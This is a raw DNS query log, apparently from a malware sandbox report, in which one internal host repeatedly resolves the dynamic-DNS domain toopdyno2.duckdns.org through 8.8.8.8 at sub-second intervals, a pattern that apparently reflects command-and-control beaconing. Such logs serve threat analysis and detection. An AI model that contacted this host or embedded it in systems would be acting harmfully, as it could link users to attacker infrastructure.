                          Mar 15, 2022 17:30:21.891079903 CET192.168.2.48.8.8.80x463bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:22.022370100 CET192.168.2.48.8.8.80x59e4Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:22.191353083 CET192.168.2.48.8.8.80xe63bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:22.318320990 CET192.168.2.48.8.8.80xef46Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:22.472471952 CET192.168.2.48.8.8.80x2d65Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:22.629209995 CET192.168.2.48.8.8.80x5348Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:22.762352943 CET192.168.2.48.8.8.80xd621Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:22.897645950 CET192.168.2.48.8.8.80xd35bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:23.052658081 CET192.168.2.48.8.8.80x4807Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:23.195889950 CET192.168.2.48.8.8.80x31a0Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:23.344840050 CET192.168.2.48.8.8.80x8407Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:23.479089975 CET192.168.2.48.8.8.80x51f4Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:23.656387091 CET192.168.2.48.8.8.80x2406Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:23.787579060 CET192.168.2.48.8.8.80xe2d3Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:23.942440033 CET192.168.2.48.8.8.80x4754Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:24.068523884 CET192.168.2.48.8.8.80xca5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:24.211225986 CET192.168.2.48.8.8.80x37e1Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:24.348850012 CET192.168.2.48.8.8.80x2b78Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:24.499689102 CET192.168.2.48.8.8.80xae39Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:24.630785942 CET192.168.2.48.8.8.80x71dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:24.763544083 CET192.168.2.48.8.8.80x8c36Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:24.897547007 CET192.168.2.48.8.8.80x4f18Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:25.041237116 CET192.168.2.48.8.8.80x913Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:25.177795887 CET192.168.2.48.8.8.80x2f37Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:25.312330008 CET192.168.2.48.8.8.80xc266Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:25.444261074 CET192.168.2.48.8.8.80x48fdStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:25.608936071 CET192.168.2.48.8.8.80x9abaStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:25.741878986 CET192.168.2.48.8.8.80x3cdeStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:25.890604019 CET192.168.2.48.8.8.80xe9a5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:26.023509979 CET192.168.2.48.8.8.80x7e51Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:26.177737951 CET192.168.2.48.8.8.80x7e8dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:26.303227901 CET192.168.2.48.8.8.80x4d2eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:26.473086119 CET192.168.2.48.8.8.80x9f93Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:27.020157099 CET192.168.2.48.8.8.80x2b1dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:27.163508892 CET192.168.2.48.8.8.80x3fa8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:27.316168070 CET192.168.2.48.8.8.80x45c0Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:27.463176966 CET192.168.2.48.8.8.80xed35Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:27.614440918 CET192.168.2.48.8.8.80x5dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:27.777259111 CET192.168.2.48.8.8.80x39b1Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:27.924437046 CET192.168.2.48.8.8.80xd5f7Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:28.053205967 CET192.168.2.48.8.8.80xf9fdStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:28.217780113 CET192.168.2.48.8.8.80x26acStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:28.350714922 CET192.168.2.48.8.8.80xb93cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:28.486816883 CET192.168.2.48.8.8.80xbaccStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:28.625526905 CET192.168.2.48.8.8.80xbbbeStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:28.766530037 CET192.168.2.48.8.8.80x4be0Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:28.897313118 CET192.168.2.48.8.8.80x65fcStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:29.044754028 CET192.168.2.48.8.8.80xe215Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:29.178229094 CET192.168.2.48.8.8.80x5135Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:29.313102961 CET192.168.2.48.8.8.80xdc84Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:29.443902969 CET192.168.2.48.8.8.80xd124Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:29.580842972 CET192.168.2.48.8.8.80x50a0Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:29.709959030 CET192.168.2.48.8.8.80xc3c0Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:29.884057045 CET192.168.2.48.8.8.80xf64fStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:30.021053076 CET192.168.2.48.8.8.80x9499Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:30.188235044 CET192.168.2.48.8.8.80x11e4Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:30.318767071 CET192.168.2.48.8.8.80x9a53Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:30.454351902 CET192.168.2.48.8.8.80x6c08Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:30.585310936 CET192.168.2.48.8.8.80xd488Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:30.735188961 CET192.168.2.48.8.8.80xacc4Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:30.868954897 CET192.168.2.48.8.8.80xf094Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:31.012927055 CET192.168.2.48.8.8.80xb3fcStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:31.148077011 CET192.168.2.48.8.8.80x7abfStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:31.277738094 CET192.168.2.48.8.8.80xc513Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:31.415985107 CET192.168.2.48.8.8.80xc2d5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:31.568466902 CET192.168.2.48.8.8.80xcd11Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:31.710071087 CET192.168.2.48.8.8.80x7b1aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:31.841562033 CET192.168.2.48.8.8.80x83fStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:31.979398012 CET192.168.2.48.8.8.80x5609Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:32.170231104 CET192.168.2.48.8.8.80x64bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:32.514039993 CET192.168.2.48.8.8.80x7c69Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:32.654026985 CET192.168.2.48.8.8.80x6762Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:32.793366909 CET192.168.2.48.8.8.80x4c2aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:32.974526882 CET192.168.2.48.8.8.80x5c74Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:33.100234985 CET192.168.2.48.8.8.80x4267Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:33.694735050 CET192.168.2.48.8.8.80x42a4Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:33.836074114 CET192.168.2.48.8.8.80x70efStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:34.023530960 CET192.168.2.48.8.8.80x593dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:34.164427042 CET192.168.2.48.8.8.80xe672Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:35.523993015 CET192.168.2.48.8.8.80x51b8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:35.760853052 CET192.168.2.48.8.8.80x6f67Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:35.905962944 CET192.168.2.48.8.8.80xa0a2Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:36.133512020 CET192.168.2.48.8.8.80x8765Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:36.292227030 CET192.168.2.48.8.8.80xb37eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:36.514152050 CET192.168.2.48.8.8.80x5acaStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:36.658139944 CET192.168.2.48.8.8.80x688cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:36.883445024 CET192.168.2.48.8.8.80x3adaStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:37.058768034 CET192.168.2.48.8.8.80x3a46Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:37.289378881 CET192.168.2.48.8.8.80x452cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:37.477715015 CET192.168.2.48.8.8.80xc5cdStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:37.615148067 CET192.168.2.48.8.8.80x9720Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:37.977355003 CET192.168.2.48.8.8.80x84dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:38.119564056 CET192.168.2.48.8.8.80xe092Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:38.269020081 CET192.168.2.48.8.8.80x75c6Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:38.399296045 CET192.168.2.48.8.8.80xb56aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:38.554614067 CET192.168.2.48.8.8.80x99a7Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:38.702646017 CET192.168.2.48.8.8.80x30a7Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:38.939331055 CET192.168.2.48.8.8.80x34b8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:39.073067904 CET192.168.2.48.8.8.80x9f64Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:39.219193935 CET192.168.2.48.8.8.80xe0faStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:39.358838081 CET192.168.2.48.8.8.80x2c9cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:39.507514954 CET192.168.2.48.8.8.80xf788Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:39.631678104 CET192.168.2.48.8.8.80xade2Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:39.817605019 CET192.168.2.48.8.8.80x428Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:39.943988085 CET192.168.2.48.8.8.80xe13fStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:40.098949909 CET192.168.2.48.8.8.80xa011Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:40.224562883 CET192.168.2.48.8.8.80x41a5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:40.361531973 CET192.168.2.48.8.8.80x5f32Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:40.585269928 CET192.168.2.48.8.8.80x679aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:40.740140915 CET192.168.2.48.8.8.80xfa8bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:40.879631996 CET192.168.2.48.8.8.80x3de6Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:41.019666910 CET192.168.2.48.8.8.80x7b56Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:41.149893045 CET192.168.2.48.8.8.80x55ecStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:41.300189018 CET192.168.2.48.8.8.80xa9c8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:41.444860935 CET192.168.2.48.8.8.80x939fStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:41.578610897 CET192.168.2.48.8.8.80x7021Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:41.709177017 CET192.168.2.48.8.8.80xebcfStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:41.885175943 CET192.168.2.48.8.8.80xe0e3Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:42.026546001 CET192.168.2.48.8.8.80xe2ecStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:42.187020063 CET192.168.2.48.8.8.80xdafeStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:42.319756031 CET192.168.2.48.8.8.80x4a7dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:42.453052998 CET192.168.2.48.8.8.80xb6ecStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:42.606350899 CET192.168.2.48.8.8.80xd780Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:42.754101992 CET192.168.2.48.8.8.80x9c14Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:42.883829117 CET192.168.2.48.8.8.80x7e6cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:43.037991047 CET192.168.2.48.8.8.80xf295Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:43.186067104 CET192.168.2.48.8.8.80xb9b7Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:43.335752010 CET192.168.2.48.8.8.80xd3b8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:43.462250948 CET192.168.2.48.8.8.80xfe35Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:43.616795063 CET192.168.2.48.8.8.80xd98Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:43.756191015 CET192.168.2.48.8.8.80xbca5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:43.889153957 CET192.168.2.48.8.8.80x860eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:44.041851997 CET192.168.2.48.8.8.80xd60Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:44.188096046 CET192.168.2.48.8.8.80x6ce8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:44.333560944 CET192.168.2.48.8.8.80x3607Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:44.470452070 CET192.168.2.48.8.8.80x240dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:44.600692034 CET192.168.2.48.8.8.80x6623Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:44.736352921 CET192.168.2.48.8.8.80x4b6Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:45.067908049 CET192.168.2.48.8.8.80x6b09Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:45.201831102 CET192.168.2.48.8.8.80x8057Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:45.334114075 CET192.168.2.48.8.8.80x9b30Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:45.472543001 CET192.168.2.48.8.8.80x72b7Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:45.602211952 CET192.168.2.48.8.8.80x651eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:45.757148981 CET192.168.2.48.8.8.80x1645Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:45.900701046 CET192.168.2.48.8.8.80xa1a6Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:46.045859098 CET192.168.2.48.8.8.80x9e90Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:46.181823969 CET192.168.2.48.8.8.80xee4bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:46.329102993 CET192.168.2.48.8.8.80x746cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:46.461213112 CET192.168.2.48.8.8.80x3af5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:46.602612019 CET192.168.2.48.8.8.80x72c2Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:46.746203899 CET192.168.2.48.8.8.80x7385Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:46.894644022 CET192.168.2.48.8.8.80x3c3dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:47.022738934 CET192.168.2.48.8.8.80x5720Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:47.189642906 CET192.168.2.48.8.8.80x697bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:47.334774971 CET192.168.2.48.8.8.80x662aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:47.468636036 CET192.168.2.48.8.8.80xa7e7Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:47.601768017 CET192.168.2.48.8.8.80xd121Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:47.738461971 CET192.168.2.48.8.8.80x9fe5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:47.866648912 CET192.168.2.48.8.8.80x1d37Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:48.031384945 CET192.168.2.48.8.8.80x2b30Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:48.164207935 CET192.168.2.48.8.8.80x1299Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:48.299415112 CET192.168.2.48.8.8.80xf737Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:48.433839083 CET192.168.2.48.8.8.80xdfd5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:48.580708027 CET192.168.2.48.8.8.80xe1b5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:48.711317062 CET192.168.2.48.8.8.80xb05fStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:48.884083033 CET192.168.2.48.8.8.80xa96dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:49.024115086 CET192.168.2.48.8.8.80x5e76Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:49.171581984 CET192.168.2.48.8.8.80x8c01Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:49.306333065 CET192.168.2.48.8.8.80x4c6Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:49.436430931 CET192.168.2.48.8.8.80x4e17Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:49.575057030 CET192.168.2.48.8.8.80xa90bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:49.727051973 CET192.168.2.48.8.8.80x9923Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:50.118067026 CET192.168.2.48.8.8.80x961Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:50.245881081 CET192.168.2.48.8.8.80x79a8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:50.394881010 CET192.168.2.48.8.8.80x341dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:50.523864031 CET192.168.2.48.8.8.80xc717Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:50.656142950 CET192.168.2.48.8.8.80xe0aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:50.792851925 CET192.168.2.48.8.8.80xa6bbStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:50.977835894 CET192.168.2.48.8.8.80x13abStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:51.148772001 CET192.168.2.48.8.8.80xcc3bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:51.373425007 CET192.168.2.48.8.8.80x8db1Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:51.506841898 CET192.168.2.48.8.8.80x537Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:51.638927937 CET192.168.2.48.8.8.80xf4c9Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:51.814203978 CET192.168.2.48.8.8.80xbe1bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:51.951390982 CET192.168.2.48.8.8.80x8595Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:52.089488029 CET192.168.2.48.8.8.80x97e2Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:52.642560005 CET192.168.2.48.8.8.80x2536Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:52.805461884 CET192.168.2.48.8.8.80xbacStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:52.955360889 CET192.168.2.48.8.8.80x6032Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:53.144612074 CET192.168.2.48.8.8.80x91e7Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:54.226320982 CET192.168.2.48.8.8.80x8873Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:54.352541924 CET192.168.2.48.8.8.80x6b3eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:54.538754940 CET192.168.2.48.8.8.80xd33eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:54.664982080 CET192.168.2.48.8.8.80xdc2Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:30:54.795047998 CET192.168.2.48.8.8.80x9bf6Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
